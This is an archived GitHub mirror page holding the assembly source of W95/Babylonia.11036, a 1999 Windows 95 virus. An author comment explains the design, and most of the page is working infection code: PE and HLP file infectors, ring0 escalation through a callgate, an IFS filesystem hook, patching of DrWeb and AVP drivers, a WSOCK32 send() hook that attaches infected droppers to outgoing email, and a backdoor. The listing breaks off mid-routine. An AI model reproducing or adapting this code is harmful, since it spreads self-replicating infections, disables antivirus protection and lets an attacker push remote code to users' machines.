Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
ad46ddacb9
vxug-MalwareSourceCode/LegacyWindows/Win95.Babylonia.11036.asm
vxunderground cb8e4ddb00
Add files via upload
2020-10-09 21:54:36 -05:00

3248 lines
103 KiB
NASM
Raw Blame History

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BABYLON.ASM]ÄÄÄ
comment ^
W95/Babylonia.11036 - Set babylonia on fire!
(c) Vecna 1999
I am of the opinion that asm talk by itself to the worthwhile reader, so, i
will be brief...
This virus is a memory resident ring0/ring3 virus, infecting PE EXE files,
HLP files, and WSOCK32.DLL. The virus use EPO features, but no encryption or
poly at all, altought it can be updated via WWW. ;)
For much time, peoples where thinking about a virus upgradeable. Some attemps
where made, as W95/SK, that was able to run special preparated data in RAR
files. But how far the upgrade RAR packet can go? In this virus, i show my
implementation of a plugin format, with the modules(plug-ins) online at a
a WWW page.
The virus is also a advanced email worm, attaching itself to all outgoing
e-mails(no sending a new one as happy99), can deal with attachments already
in e-mail body, have BASE64 and uu-encode routines, and, more important, the
icon of the infected dropper sended by email change with the current date.
When a infected app(or dropper) is executed, the virus dont get control at
this moment. The virus patch a JMP or CALL, and wait be called. When this
happen, the virus load some APIs from KERNEL32.DLL memory image(using CRC32),
then jump to ring0 using a callgate. The infamous DESCRIPTOR 0 is used to
store the temporary data, breaking the pmode tabu ;)
While in ring0, the virus alloc some memory, and install a hook in IFS handler
and wait for access to PE EXE files, HLP files, and WSOCK32.DLL. The memory
is also scanned for presence of SPIDER.VXD(DrWeb) and AVP.VXD(Z0MBiE's lib).
If they're found, their code is patched in a way that it lose the ability of
open files. After returning control to the host, if the virus has just
installed memory resident, it drop the www updater to disk and spawn it.
More about the www updater below.
PE files when accessed are infected by having the virus appended to last
section, or overwrited if is was relocs, and with the CODE sections scanned
for a suitable place for a CALL VIRUS. HLP files have added a script that pass
control immediatly to virus code by using the callback features of the API of
USER32 EnumWindows().
When WSOCK32.DLL is accessed, the send() export is redirected to a chunk of
code in top of relocation info. This code get a ring0 memory pointer to the
new send() handler, by new added functionality to the GetFileAttibute() API ;)
The code in new send() scan the outgoing data by e-mail info, and add a
infected dropper at the end of it. The virus support both MIME and non-MIME
email clients, and can add the dropper in both uu-encoded and BASE64 format.
The icon of this dropper change together with the name, to reflect some dates.
All data carried with the virus is compressed using aPLib v0.22b library. I
change my old LZW scheme by this routines due the immense gain in speed,
compressed size, and code size. Is the same algorithm i used in Fabi.9608.
When the www updater is executed, it register itself, with the fake name of
KERNEL32.EXE, in registry, to run always, and copy itself to /winsys directory
to avoid easy detection. The updater hide himself in the CTRL+ALT+DEL task
list, and stay in background waiting for the user connect to the internet.
Always in background, without any user notice, the www updater then connect
to my www page, download the virus plug-ins(that have a special format, and
can be expanded, to have full compatibility with future versions). If these
modules complain with the version and features requeried to run, it is
executed. The power of this is obvious. By adding new plugins, i can make the
virus a irc-worm, infect remote drives, or even a poly engine. The problem of
the possible take down of my URL is bypassed with the smart use of forwarders
(not implemented in the public source version of the updater).
The first module online are the greetz to the peoples that helped me in this
virus, be with betatesting, be with ideas, be with moral support. Currently
i am working in new modules, with new ideas that i think will be worth of be
coded.
If you arent a d0rk, you can contact me at vecna_br@hotmail.com, but idiot
questions about how compile and like will be ignored... and your soul can be
lost in the attempt of contact me ;)
Questions about where's the entrypoint will be ignored too... ;>
^
.586p
.model flat
locals
ofs equ offset
by equ byte ptr
wo equ word ptr
dwo equ dword ptr
fwo equ fword ptr
TRUE EQU 1
FALSE EQU 0
include host.inc
_VIRUS segment dword use32 public 'KMARAI'
vcode equ this byte
DEBUG equ FALSE ;debug version?
DROPPER_SIZE equ 6144
ENTRY_READ equ 128
SKIP_FIRST equ 16
CRLF equ <13,10>
CRC_POLY equ 0EDB88320h
CRC_INIT equ 0FFFFFFFFh
crc macro string ;jp/lapse macro
.radix 16d
crcReg = CRC_INIT
irpc _x, <string>
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
.radix 10d
endm
_gdt struc
limit dw ?
base dd ?
_gdt ends
_descriptor struc
limit_l dw ?
base_l dw ?
base_m db ?
access db ?
limit_h db ?
base_h db ?
_descriptor ends
_jmpfar struc
jmpofs32 dd ?
selectr dw ?
_jmpfar ends
_callback struc
offset_l dw ?
selector dw ?
attrib dw ?
offset_h dw ?
_callback ends
wsize2 equ 260
hook proc
db 0e9h
i_jmp dd 0 ;HLP redirector
hlp_start = ofs virusmain-$
enter 20h, 0 ;setup stack frame
push ecx
push ebx
mov ebx, [ebp+0Ch]
cmp bl, 33 ;hookz ifs_attr
je @@jmpcc
cmp bl, 36 ;hookz ifs_open
je @@jmpcc
cmp bl, 37 ;hookz ifs_ren
@@jmpcc:
jmpcc equ by $
jne @@noopen ;beware! near form of jnz
mov ebx, ebp
pusha
call delta
mov wo [ebp+(ofs jmpcc-ofs vcode)], 0e990h
add esp, -wsize2
mov edi, esp
mov eax, [ebx+10h]
inc al
jz @@nodrive
sub ax, -(":@"-1)
stosw
@@nodrive:
push 0 ;BCS_WANSI
push 255
mov eax, [ebx+1ch]
mov eax, [eax+0ch]
inc eax
inc eax
inc eax
inc eax
push eax
push edi
push 400041h ;VxDCall UniToBCSPath
call vxd
add esp, 16
dec edi ;edi=start of name
dec edi
lea esi, [edi+eax-2]
mov eax, [esi]
not eax
cmp eax, not '---.'
jne @@no_special
cmp wo [esi-10], '_\'
jne @@no_special ;trying to access the backdoor?
cmp dwo [ebx+0ch], 33 ;file attr?
jne @@no_special
mov wo [ebp+(ofs backdoor-ofs vcode)], 9090h ;wsock32.dll is calling us
@@no_special:
IF DEBUG EQ TRUE
cmp [esi-4], 'TAOG'
jne @@shit
ENDIF
xor eax, not 'EXE.' ;esi=extension
jnz @@try_hlp
doshdr equ 0
peptr equ 3ch
pehdr equ doshdr+40h
cbfr equ pehdr+0f8h
sectn equ cbfr+100h
fsize equ sectn+200h
epraw equ fsize+4
vrva equ epraw+4
lolimit equ vrva+4
uplimit equ lolimit+4
wsize4 equ uplimit+4
add esp, -wsize4 ;infect PE EXE files...
mov esi, edi
call open
jc @@err
call getsize
mov [esp+fsize], eax
cmp eax, DROPPER_SIZE ;my babies get better treatment
je @@dropper
call check_size
jz @@err1
@@dropper:
mov esi, esp
push 40h
pop ecx
sub edx, edx
call read ;read 40h of header
xor eax, ecx
jnz @@err1
movzx eax, wo [esi]
not eax
sub eax, not 'ZM' ;make sure is a EXE
jnz @@err1
cmp wo [esi+18h], 40h
jb @@err1
add cl, 0f8h-40h
sub esi, -peptr
lodsd
xchg eax, edx
call read
jc @@err1
call check_file ;already infected?
jz @@err1
movzx eax, wo [esi+22]
test eax, 0102h
jz @@err1
test eax, 3000h ;executable/no dll
jnz @@err1
movzx ecx, wo [esi+6]
cmp cl, 3
jb @@err1 ;too few sections
push 0f8h
imul ecx, ecx, 40
pop edx
add edx, [esp+peptr]
lea esi, [esp+sectn]
call read ;read section table
sub edi, edi
xchg edi, ecx
mov eax, [esp+pehdr+40]
sub eax, [esi+12]
cmp eax, [esi+8] ;entrypoint in first section?
ja @@err1
add eax, [esi+20] ;raw ofs of entrycode
mov [esp+epraw], eax
mov eax, [esi+36]
bts eax, 31 ;make 1st sec +write
jc @@err1 ;and exit if already is
bt eax, 5
jnc @@err1 ;need be CODE
test eax, 10000000h+80h+40h
jnz @@err1 ;cant be SHARED or UDATA/DATA
mov [esi+36], eax
mov eax, [esi+12]
mov [esp+lolimit], eax
add eax, [esi+8]
mov [esp+uplimit], eax ;boundaries of .code section
mov ebx, -(ofs vend-ofs vcode)
sub ecx, ebx
mov eax, [esp+pehdr+160]
sub eax, [esi+edi-40+12]
jnz @@increase ;last section isnt relocs
mov eax, [esi+edi-40+16]
add eax, ebx
jnb @@increase ;relocs too small
sub eax, eax
mov edx, eax
add eax, [esi+edi-40+12] ;rva of start of our code
mov [esp+vrva], eax
add edx, [esi+edi-40+20]
jmp @@write
@@increase:
mov eax, [esi+edi-40+8]
mov edx, eax
add eax, [esi+edi-40+12]
add edx, [esi+edi-40+20]
mov [esp+vrva], eax ;rva of start of our code
sub [esi+edi-40+8], ebx
mov eax, [esi+edi-40+16]
sub eax, ebx ;increase last section
mov ebx, [esp+pehdr+60]
dec ebx
add eax, ebx
not ebx
and eax, ebx ;align raw section size
mov [esi+edi-40+16], eax
@@write:
mov dwo [esi+edi-40+36], 0c0000040h
sub dwo [esp+vrva], -(ofs virusmain-ofs vcode)
add esi, edi
add esi, (-40+8)
lodsd
xchg ebx, eax
lodsd
add ebx, eax ;rva+size
mov eax, [esp+pehdr+56]
dec eax
add ebx, eax
not eax
and ebx, eax ;align it
mov [esp+pehdr+80], ebx ;update imagesize
mov esi, ebp
pusha
mov edx, [esp+epraw+((8*4))]
push ENTRY_READ
lea esi, [esp+cbfr+(8*4)+4]
pop ecx
call read ;read entrycode
pusha
push SKIP_FIRST
pop eax
add esi, eax ;skip first bytes(antiAV)
sub ecx, eax
@@jmp_call:
lodsb
cmp al, 0e8h ;call
je @@found
cmp al, 0e9h ;jmp
je @@found
@@loop1:
loop @@jmp_call
mov edi, [esp+(1*4)] ;put CALL at start
push 5
pop esi
jmp @@calculate
@@found:
mov edi, esi
lodsd ;displacement
mov edx, esi
sub esi, [esp+(1*4)] ;turn to distance
add eax, esi
add eax, [esp+pehdr+40+(16*4)] ;add entrypoint(our base)
cmp eax, [esp+lolimit+(16*4)]
jb @@out
cmp eax, [esp+uplimit+(16*4)] ;valid call?
jb @@fine
@@out:
sub ecx, 4
mov esi, edx
jmp @@loop1
@@fine:
dec edi
@@calculate:
push esi
mov esi, edi
lodsb
not eax
mov by [ebp+(ofs instr1-ofs vcode)], al ;save modificated code
lodsd
not eax
mov [ebp+(ofs instr2-ofs vcode)], eax
pop ecx
add ecx, [esp+pehdr+40+(16*4)] ;add entrypoint
mov al, 0e8h
stosb
mov eax, [esp+vrva+(16*4)] ;our rva
sub eax, ecx
stosd ;build call to it
popa
call write ;write entrycode
popa
call write ;write virus body
sub edx, edx
push 0f8h
lea esi, [esp+peptr+4]
lodsd
pop ecx
xchg edx, eax
bts wo [esi+22], 0
mov [esi+160], eax ;strip relocs
mov [esi+164], eax
call write ;write old header
add edx, eax
movzx ecx, wo [esi+6]
imul ecx, ecx, 40
sub esi, -(sectn-pehdr)
call write ;write section table
@@err1:
call close
@@err:
add esp, wsize4
@@try_hlp:
xor eax, not 'PLH.' xor not 'EXE.'
jnz @@wsockdll
buffer equ 0 ;stack frame
old_ofs equ 4
old_sz equ 8
patch1 equ 12
wsize3 equ 16
mainhdr equ 0 ;buffer structure
pagedir equ 10h
syshdr equ 210h
build equ 225h
add esp, -wsize3 ;infect HLP files...
mov esi, edi
call open
jc @@error000
push 32*1024
push 040000dh ;getheap
call vxd
pop ecx
mov [esp+buffer], eax
mov esi, eax ;esi=buffer.mainhdr
push 10h
pop ecx
sub edx, edx
call read ;read 10h of header
jc @@free
lodsd
xor eax, 035f3fh ;hlp signature?
jnz @@free
lodsd
lea edx, [eax+37h] ;edx=directory offset
mov ecx, 200h
lodsd
lodsd ;esi=buffer.pagedir
call read
mov ecx, eax
@@search:
dec ecx
jz @@free
cmp dwo [esi+ecx], 'SYS|'
jnz @@search
cmp dwo [esi+ecx+4], 'MET'
jnz @@search
mov eax, [esi-4] ;eax=end of file
xchg eax, [esi+ecx+8] ;section code = end of file
xchg eax, edx
push 15h
push 15h
sub esi, -(syshdr-pagedir)
pop ecx
call read ;read sys hdr
mov ecx, [esi]
pop eax
sub ecx, eax
add edx, eax
mov [esp+old_ofs], edx
mov [esp+old_sz], ecx ;save old code position/size
mov edi, [esp.buffer]
sub edi, -build
lea esi, [ebp+(ofs hlp1_s-ofs vcode)]
lea eax, [edi+(ofs _size-ofs hlp1_s)]
mov [esp.patch1], eax
push hlp1_sz
pop ecx
@@decr:
lodsb ;copy start macro
not al
stosb
loop @@decr
push edi ;edi=buffer
mov dwo [ebp+(ofs i_jmp-ofs vcode)], hlp_start
lea esi, [ebp+(ofs vend-ofs vcode)]
@@next:
add esi, -4
mov eax, [esi]
call check
test edx, edx ;can make it directly?
jnz @@ext
mov al, 12h ;push ?
org $-1
push 12345678h
org $-4
stosb
mov eax, [esi]
stosd
jmp @@done_
@@ext:
mov al, 0b8h ;mov eax, ?
stosb
mov eax, [esi]
xor eax, edx
stosd
mov al, 35h ;xor eax, ?
stosb
mov eax, edx
stosd
mov al, 50h ;push eax
stosb
@@done_:
cmp esi, ebp
jne @@next
pop eax
mov ecx, edi
sub ecx, eax ;ecx=poly code
sub eax, eax
mov dwo [esi+(ofs i_jmp-ofs vcode)], eax
push ecx
add ecx, (ofs hlp1_e-ofs p1)+(ofs hlp2_e-ofs hlp1_e)
mov eax, [esp.patch1+4]
mov wo [eax], cx ;patch macro size
sub esi, -(ofs hlp1_e-ofs vcode)
push hlp2_sz
pop ecx
rep movsb ;copy end macro
pop eax
mov esi, [esp.buffer]
sub esi, -syshdr
add eax, hlp2_e-hlp1_s
add [esi], eax
add [esi+4], eax ;fix syshdr size
mov esi, edi
mov edx, [esp.old_ofs]
mov ecx, [esp.old_sz]
sub eax, ecx ;old script too large?
jbe @@free
call read ;read old code
cmp [esi+4], "`(RR"
je @@free ;probably already infected
mov ebp, [esp.buffer] ;ebp=buffer
lea ecx, [edi+eax]
sub ecx, ebp ;ecx=our size
add ecx, -syshdr
mov edx, [ebp.mainhdr+12]
lea esi, [ebp.syshdr]
call write ;write our code
mov esi, [esp.buffer]
push 10h
add [esi.mainhdr+12], eax
sub edx, edx
pop ecx
call write ;write main header
mov edx, [esi.mainhdr+4]
sub edx, -37h
mov ecx, 200h
add esi, pagedir
call write ;write directory
@@free:
push dwo [esp+buffer]
push 040000eh ;freeheap
call vxd
pop eax
call close ;close file
@@error000:
add esp, wsize3
@@wsockdll:
; xor eax, not 'EXE.' xor not 'PLH.' xor not 'LLD.'
xor eax, 01c000c00h
jnz @@shit
IF DEBUG EQ FALSE
mov eax, [esi-4]
mov esi, [esi-8]
not eax
xchg eax, esi
not eax
cmp esi, not '23KC'
jne @@shit
cmp eax, not 'OSW\'
jne @@shit
ENDIF
obufer equ 0 ;stack frame
header equ obufer+3ch
pe_hdr equ header+4
section equ pe_hdr+0f8h
export equ section+200h
vofs equ export+4
vraw equ vofs+4
etable equ vraw+4
wsize1 equ etable+(4*20)
add esp, -wsize1 ;patch WSOCK32.DLL...
mov esi, edi
call open
jc @@error0
call getsize
mov edi, eax
call check_size
jz @@error1
sub edx, edx
mov ecx, 40h
lea esi, [esp+obufer]
call read
cmp wo [esp+obufer], 'ZM'
jne @@error1
push 0f8h
pop ecx
mov edx, [esp+header]
cmp edx, edi
jae @@error1 ;point outside of the file?
lea esi, [esp+pe_hdr]
call read
jc @@error1
call check_file
jz @@error1
call write ;write pe header
add edx, eax
movzx ecx, wo [esi+6]
push ecx
imul ecx, ecx, 40
lea esi, [esp+section+4]
call read ;read section table
pop ecx
@@writeable:
bts dwo [esi+36], 31 ;make all sections writeable
sub esi, -40
loop @@writeable
mov [esi-40+36], 0c0000040h
mov ecx, [esi-40+8] ;increase last section
push ecx
add ecx, [esi-40+20]
mov [esp+vraw+4], ecx ;raw of our patch
pop ecx
add ecx, [esi-40+12]
mov [esp+vofs], ecx ;rva of our patch
add dwo [esi-40+8], (ofs pend-ofs pstart)
mov ebx, [esi-40+8]
cmp ebx, [esi-40+16]
jbe @@fit
mov ecx, [esp+pe_hdr+60]
dec ecx
add ebx, ecx
not ecx
and ebx, ecx
mov [esi-40+16], ebx ;align
@@fit:
xchg eax, ecx
lea esi, [esp+section]
call write
mov eax, [esp+pe_hdr+120] ;eax=export table
call rva2raw
xchg eax, edx
push 4
pop ecx
sub edx, -28
lea esi, [esp+export]
call read ;read export table addresses
mov eax, [esi]
call rva2raw
xchg eax, edx
push (4*20)
pop ecx
lea esi, [esp+etable] ;read 20 exports
call read
mov eax, [esp+vofs]
mov edi, [esp+pe_hdr+52] ;wsock32 base
sub eax, -(ofs send-ofs pstart)
xchg [esi+(4*18)], eax ;hook send
add edi, eax
mov [ebp+(ofs oldsend-ofs vcode)], edi
mov [ebp+(ofs _send-ofs vcode)], edi
call write
mov edx, [esp+vraw]
push (ofs pend-ofs pstart)
pop ecx
call delta
sub ebp, -(ofs pstart-ofs vcode)
xchg esi, ebp
call write ;write our patch
@@error1:
call close
@@error0:
add esp, wsize1
@@shit:
add esp, wsize2 ;release tmp buffer
mov wo [ebp+(ofs jmpcc-ofs vcode)], 0850fh
popa
@@noopen:
push 6
push 1Ch
pop ebx
pop ecx ;total=6 paramz
@@nparam:
mov eax, [ebp+ebx] ;copy paramz from old frame
push eax ;to new frame
add ebx, -4
loop @@nparam
db 0b8h ;mov eax, ?
oldhook dd 0
call [eax] ;call old hookz
add esp, 6*4
backdoor equ $
jmp @@closed
call @@delta
@@delta:
pop ecx
add ecx, (ofs my_send-ofs @@delta)
mov wo [ecx-(ofs my_send-ofs backdoor)], ((ofs @@closed-(ofs backdoor+2))*100h)+0ebh
mov ebx, [ebp+1ch] ;ioreq
push esi
mov esi, [ebx+14h]
lodsd ;c:\_
sub eax, eax
mov ebx, eax
@@byte:
lodsb ;get filename char
inc ah
sub al, 'A'
or bl, al ;build address
cmp ah, 8
je @@doneb
shl ebx, 4
jmp @@byte
@@doneb:
mov [ebx], ecx ;patch requested address
pop esi
@@closed:
pop ebx
pop ecx
leave
ret
hook endp
delta proc
call @@delta
@@delta:
pop ebp
add ebp, -(ofs @@delta-ofs vcode)
ret
delta endp
check_file proc
mov eax, [esi]
not eax
cmp eax, not 'EP'
jne @@error
cmp wo [esi+4], 14ch ;386
jb @@error
cmp wo [esi+4], 14eh ;586
ja @@error
xor eax, edx ;(not('PE')xor(pe_ofs)xor(entry))
bswap eax
xor eax, [esi+40]
cmp [esi+8], eax ;infected?
mov [esi+8], eax
db 066h, 0b8h ;mov ax, ?
@@error:
sub eax, eax
ret
check_file endp
gdt equ 0
idt equ 6
ring0_cs equ 12
ring0_ds equ 16
jmpfar equ 20
wsize equ 26
kernel32 equ 0bff70000h
virusmain proc
pushf
pusha
add esp, -wsize
cld
sub eax, eax
call @@seh
mov esp, [esp+8] ;hmm... SEH... :/
jmp @@installed
@@seh:
push dwo fs:[eax]
mov fs:[eax], esp
mov esi, [kernel32+80h+120] ;get kernel32 APIs...
mov esi, [esi]
sub esi, -(kernel32+24) ;esi=export directory+24
lodsd
push eax
lodsd
push eax
lodsd
xchg ebx, eax
pop ebp ;ebp=RVA table
pop ecx ;ecx=number of names
lodsd
xchg esi, eax ;esi=names table
xchg esi, ebx ;ebx=ordinal table
mov edx, -kernel32
sub esi, edx
sub ebp, edx
sub ebx, edx ;edx=-kernel32
sub edi, edi
@@loopy:
inc edi ;edi=ordinal counter
lodsd ;eax=API name string
pusha
sub eax, edx
xchg eax, esi
push CRC_INIT ;calculate crc of string
pop ecx
@@next_byte:
lodsb
test al, al
jz @@done
xor cl, al
mov al, 8
@@next_bit:
shr ecx, 1
jnc @@poly
xor ecx, CRC_POLY
@@poly:
dec al
jnz @@next_bit
jmp @@next_byte
@@done:
call @@delta1
@@delta1:
pop esi
add esi, (ofs _openfile-ofs @@delta1)
cmp ecx, 12345678h ;crcz of API
org $-4
crc <CreateFileA>
je @@patch_api
sub esi, -((ofs _getfattr-ofs vcode)-(ofs _openfile-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <GetFileAttributesA>
je @@patch_api
sub esi, -((ofs _writefile-ofs vcode)-(ofs _getfattr-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <WriteFile>
je @@patch_api
add esi, ((ofs _closehandle-ofs vcode)-(ofs _writefile-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <CloseHandle>
je @@patch_api
sub esi, -((ofs _seekfile-ofs vcode)-(ofs _closehandle-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <SetFilePointer>
je @@patch_api
add esi, (ofs _loadl-ofs vcode)-(ofs _seekfile-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <LoadLibraryA>
je @@patch_api
add esi, (ofs _freel-ofs vcode)-(ofs _loadl-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <FreeLibrary>
je @@patch_api
sub esi, -((ofs _getproc-ofs vcode)-(ofs _freel-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <GetProcAddress>
je @@patch_api
add esi, (ofs _gsystime-ofs vcode)-(ofs _getproc-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <GetSystemTime>
je @@patch_api
sub esi, -((ofs _fdelete-ofs vcode)-(ofs _gsystime-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <DeleteFileA>
je @@patch_api
add esi, (ofs _readfile-ofs vcode)-(ofs _fdelete-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <ReadFile>
je @@patch_api
add esi, (ofs _getmhandle-ofs vcode)-(ofs _readfile-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <GetModuleHandleA>
je @@patch_api
sub esi, -((ofs _winexec-ofs vcode)-(ofs _getmhandle-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <WinExec>
jne @@end_loopy
@@patch_api:
movzx eax, wo [ebx+(edi*2)] ;get ordinal
dec eax
mov eax, [ebp+(eax*4)] ;get rva
sub eax, edx
mov [esi], eax ;got it!
@@end_loopy:
popa
dec ecx
jnz @@loopy ;all APIs scanned
call delta
lea eax, [ebp+(ofs wsock-ofs vcode)]
push eax
db 0b8h
_loadl dd 0
call eax ;load wsock32.dll
xchg eax, ecx
jecxz @@suxx
push ecx ;for FreeLibrary
call @@send
db 'send', 0
@@send:
push ecx
db 0b8h+7 ;GetProcAddress
_getproc dd 0
call edi
cmp by [eax], 0e8h ;the difference between masters
jne @@isnt ;and pupils ;)
cmp by [eax+5], 0b8h
jne @@isnt
mov eax, [eax+6] ;get real addy :)
@@isnt:
mov [ebp+(ofs oldsend-ofs vcode)], eax
db 0b8h
_freel dd 0
call eax
@@suxx:
push 8
push ebp
pop esi
push (ofs vend-ofs vcode)/4 ;make sure we're commited
pop ecx
rep lodsd
pop eax
lea edi, [ebp+(ofs myname-ofs vcode)]
xchg eax, ecx
rep stosd
mov ebp, esp ;jmp2ring0...
push 1
sgdt [ebp+gdt] ;get global descriptor table
sidt [ebp+idt] ;get interrupt table
mov esi, [ebp+gdt.base]
mov edi, esi
movzx ecx, wo [ebp+gdt.limit]
pop ebx
@@search_gdt:
sub eax, eax
cmp wo [esi.limit_l], 0ffffh
jne @@next_descriptor
cmp by [esi.limit_h], 0cfh ;descriptor start at 0?
jne @@next_descriptor
cmp wo [esi.base_l], ax ;and cover the whole range?
jne @@next_descriptor
cmp by [esi.base_m], al
jne @@next_descriptor
cmp by [esi.base_h], al
jne @@next_descriptor ;is a flat descriptor!
cmp [esi.access], 9bh
jne @@no_code ;is a code descriptor?
mov eax, esi
sub eax, [ebp+gdt.base]
mov [ebp+ring0_cs], eax ;yes, save it!
shl ebx, 1
jmp @@next_descriptor
@@no_code:
cmp [esi.access], 93h
jne @@next_descriptor ;is a data descriptor?
mov eax, esi
sub eax, [ebp+gdt.base]
mov [ebp+ring0_ds], eax ;yes, save it!
shl ebx, 1
@@next_descriptor:
lodsd
lodsd
bt ebx, 2 ;our 2 descriptors found?
jc @@search_done
loop @@search_gdt
jmp @@installed ;flat descriptors dont found
@@search_done:
mov esi, edi ;esi=1st entry
lodsd ;edi=nul entry
lodsd
test eax, eax ;nul entry isnt empty?
jnz @@installed ;then already resident
pusha
movsd
movsd ;backup 1st descriptor
popa
mov eax, dwo [ebp+ring0_cs]
mov wo [esi.selector], ax ;ring0 code selector
mov wo [esi.attrib], 0ec00h
call @@over_ring0_code ;[esp]=ring0 code
@@ring0_code:
mov ds, ax
mov es, ax ;setup data access
xchg esi, edi
movsd ;restore 1st descriptor
movsd
mov edi, ebp
mov ebx, [edi.gdt.base]
movzx ecx, wo [edi.gdt.limit]
call protect ;make gdt read only
mov ebx, [edi.idt.base]
movzx ecx, wo [edi.idt.limit]
call protect ;make idt read only
push 00270005h
call vxd ;VXDLDR GetDeviceList
@@next:
mov ebx, [eax+5] ;VxD_Desc_Block *DI_DDB
sub ebx, 0C0000000h
jc @@next_vxd
lea ecx, [ebx+0C000000Ch] ;Name_0
cmp [ecx], 'DIPS' ;'SPIDER '
je @@patch
cmp [ecx], '9PVA' ;'AVP95 '
jne @@next_vxd
@@patch:
push 0000D500h ;R0_OPENCREATFILE
pop esi
call ScanVxd
inc esi ;R0_OPENCREAT_IN_CONTEXT
call ScanVxd
@@next_vxd:
mov eax, [eax]
or eax, eax
jnz @@next
push 9
push eax
push eax
push eax
push eax
push eax
push 1
push 64/4 ;memory for email shitz
push 010053h
call vxd
add esp, 8*4
test eax, eax
jz @@fucked
mov [ebp+(ofs mem_temp-ofs vcode)], eax
@@fucked:
push (ofs vend-ofs vcode)
push 9
push eax
push eax
push eax
push eax
push eax
push 1
push (((ofs vend-ofs vcode)+4095)/4096)
push 010053h ;PageAlloc
call vxd
add esp, 8*4
test eax, eax
jz @@fuck
mov edi, eax
xchg eax, ecx
xchg ecx, [esp] ;pop size/push &hook
push ebp
pop esi
rep movsb
mov [edi+(ofs i_jmp-ofs vcode)-(ofs vend-ofs vcode)], ecx
mov [edi+(ofs socket_out-ofs vcode)-(ofs vend-ofs vcode)], ecx
mov wo [edi+(ofs jmpcc-ofs vcode)-(ofs vend-ofs vcode)], 0850fh
push 00400067h ;install ifs hook
call vxd
mov [edi+(ofs oldhook-ofs vcode)-(ofs vend-ofs vcode)], eax
@@fuck:
pop eax
retf
@@over_ring0_code:
pop eax
mov ebx, eax
shr eax, 16
mov wo [esi.offset_l], bx ;address of routine
mov wo [esi.offset_h], ax
push 0
pop dwo [ebp+jmpfar.jmpofs32]
mov wo [ebp+jmpfar.selectr], 8 ;jmp to callback 1
mov eax, dwo [ebp+ring0_ds] ;set ring0 data
push ds
push es
cli
call fwo [ebp+jmpfar] ;call our ring0 code
cli
pop es
pop ds
@@installed:
sub eax, eax
pop dwo fs:[eax] ;remove SEH
pop ecx
call delta
mov eax, [ebp+(ofs mem_temp-ofs vcode)]
test eax, eax
jz @@no_ready
push eax
call @@over
include updater.inc
@@over:
call _aP_depack_asm ;unpack updater data
push eax
push 2
pop ecx
lea esi, [ebp+(ofs dropname-ofs vcode)]
call r3_open
pop ecx
jz @@no_ready
mov esi, [ebp+(ofs mem_temp-ofs vcode)]
call r3_write
call r3_close
push 0
lea eax, [ebp+(ofs dropname-ofs vcode)]
push eax
db 0b8h
_winexec dd 0
call eax
@@no_ready:
cmp dwo [ebp+(ofs i_jmp-ofs vcode)], 0
je @@pe_exe
add esp, wsize
popa
popf
add esp, (ofs vend-ofs vcode)
sub eax, eax ;stop enumeration
ret 8 ;return to callback
@@pe_exe:
lea eax, [esp+wsize+(9*4)]
mov edi, [eax]
sub edi, 5 ;return place
mov [eax], edi
mov al, not 0b8h
instr1 equ by $-1
not eax
stosb
mov eax, 12345678h
instr2 equ dwo $-4
not eax
stosd
add esp, wsize
popa
popf
ret ;return to same place!
virusmain endp
hlp1_s = $
dw 4
dw (ofs _label1-ofs _label2)
_label2 = $
db "RR(`USER32.DLL',`EnumWindows',`SU')", 0
_label1 = $
dw 4
_size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e = $
hlp1_sz = hlp1_e-hlp1_s
jmp esp
db "',666)", 0 ;29A
hlp2_e = $
hlp2_sz = hlp2_e-hlp1_e
check proc
call checkv
jc @@again_1
sub edx, edx
ret
@@again_1:
mov ebx, eax
@@again:
mov eax, ebx
call rnd
xor eax, edx
call checkv ;eax was validated?
jc @@again
xchg eax, edx ;edx is valid modifier?
call checkv
jc @@again
xchg edx, eax
ret
check endp
rnd proc
call @@2
dd 12345678h
@@2:
pop edx
sub [edx], 12345678h
org $-4
v2 dd 87654321h
mov edx, [edx]
xor [ebp+(ofs v2-ofs vcode)], edx ;get rnd number
ret
rnd endp
checkv proc
pusha
push 4
pop ecx
@@1:
cmp al, ' '
jbe @@error
cmp al, 0f0h
ja @@error
cmp al, '"'
jz @@error
cmp al, "'"
jz @@error
cmp al, "`"
jz @@error
cmp al, "\"
jz @@error
ror eax, 8 ;check for invalid characters
loop @@1 ;for hlp script
clc
mov cl, 12h
org $-1
@@error:
stc
popa
ret
checkv endp
open proc
call getatt
mov [ebp+(ofs attr-ofs vcode)], eax
sub ecx, ecx
call setatt
mov [ebp+(ofs fname-ofs vcode)], esi
mov eax, 0D500h
push 1h
sub ecx, ecx
mov ebx, 2022h
pop edx
call io
mov [ebp+(ofs handle-ofs vcode)], eax
ret
open endp
getsize proc
mov eax, 0D800h
__2_:
jmp __2__
getsize endp
close proc
mov eax, 0D700h
call __2_
mov ecx, 12345678h
attr equ dwo $-4
mov esi, 12345678h
fname equ dwo $-4 ;set old file attribute
close endp
setatt proc
mov eax, 4301h
__2__:
jmp __2___
setatt endp
getatt proc
mov eax, 4300h
__2___:
jmp __2
getatt endp
write proc
mov eax, 0D601h
jmp __2___
write endp
read proc
mov eax, 0D600h
__2:
mov ebx, 12345678h
handle equ dwo $-4
read endp
io proc
call delta
mov [ebp+(ofs eax_value-ofs vcode)], eax
mov eax, 00400032h ;Ring0_IO
xchg eax, [esp]
push eax
io endp
